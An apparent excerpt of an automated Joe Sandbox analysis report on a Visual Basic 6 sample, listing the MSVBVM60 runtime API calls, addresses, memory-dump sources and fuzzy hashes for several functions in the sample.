                                                                                    • Opcode Fuzzy Hash: 933fd5c5f8b2a3423e0ed97259365dad75bd5c53feb0989c152de9d692c0184e
                                                                                    • Instruction Fuzzy Hash: 82612D76D00249ABCB01EFE5C846BEEBBB8EF04744F50802BF511BB191D77C96458BA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6), ref: 0041AE74
                                                                                    • __vbaLenBstr.MSVBVM60(004014D0,?,?,?,00000000,004016A6), ref: 0041AE8B
                                                                                    • #631.MSVBVM60(004014D0,00000001,00000002), ref: 0041AED8
                                                                                    • __vbaStrMove.MSVBVM60(004014D0,00000001,00000002), ref: 0041AEE2
                                                                                    • #516.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEE8
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEF4
                                                                                    • __vbaFreeVar.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEFC
                                                                                    • __vbaLenBstr.MSVBVM60(?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF18
                                                                                    • #631.MSVBVM60(?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF34
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF3E
                                                                                    • #516.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF44
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF50
                                                                                    • __vbaFreeVar.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF58
                                                                                    • #608.MSVBVM60(00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF7A
                                                                                    • __vbaVarAdd.MSVBVM60(?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF8B
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF91
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF9B
                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0), ref: 0041AFAA
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041AFBD
                                                                                    • __vbaFreeStr.MSVBVM60(0041AFFF), ref: 0041AFF9
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,00000002,00000000,004014D0,00000001,00000002), ref: 0041B013
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$#516#631Bstr$#608ChkstkCopyErrorListOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 2799467133-0
                                                                                    • Opcode ID: 1c80654a9a741580ff48f963b013354f664b96ff21e757f4ec07deb7fb294dae
                                                                                    • Instruction ID: 1b483a11e3d0ed2e8c04f0b8c752b5f123881d7f75aaa677409f8459dd4cdbba
                                                                                    • Opcode Fuzzy Hash: 1c80654a9a741580ff48f963b013354f664b96ff21e757f4ec07deb7fb294dae
                                                                                    • Instruction Fuzzy Hash: 0841FE76D00208ABCB05FFE5D845ADEB7B9AF08308F50802AF415B71A1EF7C5A49CB59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6), ref: 0041B402
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004016A6), ref: 0041B432
                                                                                    • __vbaNew2.MSVBVM60(004171B8,00000000,000000FF), ref: 0041B44D
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171C8,0000007C), ref: 0041B49A
                                                                                    • __vbaCastObj.MSVBVM60(?,00417E0C), ref: 0041B4B0
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,00417E0C), ref: 0041B4BA
                                                                                    • __vbaFreeObj.MSVBVM60(?,00000000,?,00417E0C), ref: 0041B4C2
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00417E0C,00000024), ref: 0041B4F5
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00417E0C,00000034), ref: 0041B539
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00417E0C,00000034), ref: 0041B557
                                                                                    • __vbaCastObj.MSVBVM60(00000000,004171A8), ref: 0041B56F
                                                                                    • __vbaObjSet.MSVBVM60(00000000,00000000,00000000,004171A8), ref: 0041B579
                                                                                    • __vbaFreeObj.MSVBVM60(0041B5B9,00000000,00000000,00000000,004171A8), ref: 0041B5AB
                                                                                    • __vbaFreeObj.MSVBVM60(0041B5B9,00000000,00000000,00000000,004171A8), ref: 0041B5B3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckFreeHresult$Cast$ChkstkErrorMoveNew2
                                                                                    • String ID:
                                                                                    • API String ID: 1298571524-0
                                                                                    • Opcode ID: ab8b20f795f7eb68a97f155c5062c8a7b7e17257fe333b2664f392b95f537f49
                                                                                    • Instruction ID: 5352fda1de1bb8fd44a2ca76232ab38bb3ffd0e3920d4e1e32231d360fb3001f
                                                                                    • Opcode Fuzzy Hash: ab8b20f795f7eb68a97f155c5062c8a7b7e17257fe333b2664f392b95f537f49
                                                                                    • Instruction Fuzzy Hash: 4A51DF71D40208AFDB00EFA5C945BDDBBB4EF08708F20806AF511BB2A1D7795A45DFA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,?,00000015,004016A6,00000001), ref: 0041AD12
                                                                                    • __vbaLenBstr.MSVBVM60(004014C0,?,?,?,00000000,004016A6), ref: 0041AD29
                                                                                    • #632.MSVBVM60(?,00004008,00000001,00000002), ref: 0041ADA0
                                                                                    • __vbaVarCat.MSVBVM60(?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADB4
                                                                                    • __vbaI4ErrVar.MSVBVM60(00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADBA
                                                                                    • #537.MSVBVM60(00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADC0
                                                                                    • __vbaStrMove.MSVBVM60(00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADCA
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADD0
                                                                                    • __vbaStrMove.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADDA
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADE2
                                                                                    • __vbaFreeVarList.MSVBVM60(00000004,00000002,?,?,?,00000000,00000000,00000000,?,?,00000008,?,?,00004008,00000001,00000002), ref: 0041ADF9
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0041AE53
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FreeMove$#537#632BstrChkstkErrorListOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 4204360173-0
                                                                                    • Opcode ID: 9079adedfb1e4168ae56332b3bd7e2ad2e82147f1aed6ccd27be71f1baf0200a
                                                                                    • Instruction ID: a2acd3fc5ce1e320d1d355b2b6f0e125889106b46c88f37359d4e3ac7756507f
                                                                                    • Opcode Fuzzy Hash: 9079adedfb1e4168ae56332b3bd7e2ad2e82147f1aed6ccd27be71f1baf0200a
                                                                                    • Instruction Fuzzy Hash: 9431A9B2D00219ABDB01EFD5C986FEEBBB8BF04304F54442BF105B7191DB7855458B95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 0041B680
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000002,?,?,004016A6), ref: 0041B69A
                                                                                      • Part of subcall function 0041B5CD: __vbaChkstk.MSVBVM60(00000000,004016A6,004015D8,?,00000002,?,?,004016A6), ref: 0041B5E9
                                                                                      • Part of subcall function 0041B5CD: __vbaOnError.MSVBVM60(000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B619
                                                                                      • Part of subcall function 0041B5CD: __vbaUbound.MSVBVM60(00000001,?,000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B62C
                                                                                      • Part of subcall function 0041B5CD: __vbaLbound.MSVBVM60(00000001,?,00000001,?,000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B63A
                                                                                    • __vbaI2I4.MSVBVM60(004015D8,?,00000000,?,00000000,004016A6), ref: 0041B6B2
                                                                                    • __vbaDerefAry1.MSVBVM60(004015D8,00000000), ref: 0041B6EE
                                                                                    • __vbaDerefAry1.MSVBVM60(004015D8,00000000,004015D8,00000000), ref: 0041B711
                                                                                    • #608.MSVBVM60(?,?,004015D8,00000000,004015D8,00000000), ref: 0041B71E
                                                                                    • __vbaVarCat.MSVBVM60(?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B72F
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000,?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B735
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B73F
                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B74E
                                                                                    • __vbaStrCopy.MSVBVM60(004015D8,00000000), ref: 0041B765
                                                                                    • __vbaFreeStr.MSVBVM60(0041B79F), ref: 0041B799
                                                                                    • __vbaErrorOverflow.MSVBVM60(004015D8,?,00000000,?,00000000,004016A6), ref: 0041B7B3
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,?,?,004016A6), ref: 0041B7D4
                                                                                    • #717.MSVBVM60(?,00004008,00000080,00000000), ref: 0041B802
                                                                                    • __vbaVar2Vec.MSVBVM60(?,?,?,00004008,00000080,00000000), ref: 0041B80F
                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,00004008,00000080,00000000), ref: 0041B81C
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00004008,00000080,00000000), ref: 0041B824
                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,00004008,00000080,00000000), ref: 0041B831
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0041B872,?,?,?,?,?,?,?,00004008,00000080,00000000), ref: 0041B86C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$ChkstkFree$Ary1CopyDerefError$#608#717DestructLboundListOverflowUboundVar2
                                                                                    • String ID:
                                                                                    • API String ID: 540562774-0
                                                                                    • Opcode ID: aa49e4b08db19f750d1313d8b8314369ff47381929f1d5ed0e5a2e23e84cac8c
                                                                                    • Instruction ID: 12d6025552427dd28d458c1af6eaa4522468dd8a08945a176294c0d25e15a14b
                                                                                    • Opcode Fuzzy Hash: aa49e4b08db19f750d1313d8b8314369ff47381929f1d5ed0e5a2e23e84cac8c
                                                                                    • Instruction Fuzzy Hash: 83212F75C00159AACB01EBE5C942AFEBBBCEF04704F14802BF511EB1A1D77C9985CB99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,?,?,004016A6), ref: 0041B7D4
                                                                                    • #717.MSVBVM60(?,00004008,00000080,00000000), ref: 0041B802
                                                                                    • __vbaVar2Vec.MSVBVM60(?,?,?,00004008,00000080,00000000), ref: 0041B80F
                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,00004008,00000080,00000000), ref: 0041B81C
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00004008,00000080,00000000), ref: 0041B824
                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,00004008,00000080,00000000), ref: 0041B831
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0041B872,?,?,?,?,?,?,?,00004008,00000080,00000000), ref: 0041B86C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$#717ChkstkDestructFreeVar2
                                                                                    • String ID:
                                                                                    • API String ID: 2770403345-0
                                                                                    • Opcode ID: 6a20b4fc4b6aba7980897d37e491f761c4dbb1c6d12768856b49e88f0cf0eaf0
                                                                                    • Instruction ID: 51f9e0401e8b082d3f17bff6ac8f5d8ab5ef547d44a11f48efa70ba67d3f8a97
                                                                                    • Opcode Fuzzy Hash: 6a20b4fc4b6aba7980897d37e491f761c4dbb1c6d12768856b49e88f0cf0eaf0
                                                                                    • Instruction Fuzzy Hash: 7C01BA72D40208BADB01EBE5C886FDEB7BCAB04704F40852BF211B7191D778A5088B64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%